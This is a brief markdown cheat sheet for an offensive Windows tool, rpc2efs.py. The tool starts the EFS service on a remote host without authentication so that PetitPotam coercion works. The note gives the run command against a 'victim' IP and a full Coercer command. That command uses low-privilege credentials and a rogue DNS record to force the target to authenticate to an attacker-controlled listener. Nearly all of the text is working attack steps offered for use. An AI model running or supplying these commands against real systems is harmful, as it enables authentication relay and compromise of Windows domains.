# rpc2efs.md

A cool tool for performing "Unauthenticated start EFS service on remote Windows host (make PetitPotam great again)."

# Install/run

  • Get impacket installed
  • Run against a system you need to coerce from, such as a Win 11 enterprise box!
python3 rpc2efs.py ip.address.of.victim

# Once run, the output should say:
# [*] EFS should be running now.

# Attack

coercer coerce --auth-type http -u lowpriv -p 'MyPassLOL!' -l ROGUE-DNS-RECORD-I-ADDED-PREVIOUSLY -t ip.of.victim2.coerce --filter-pipe-name efsrpc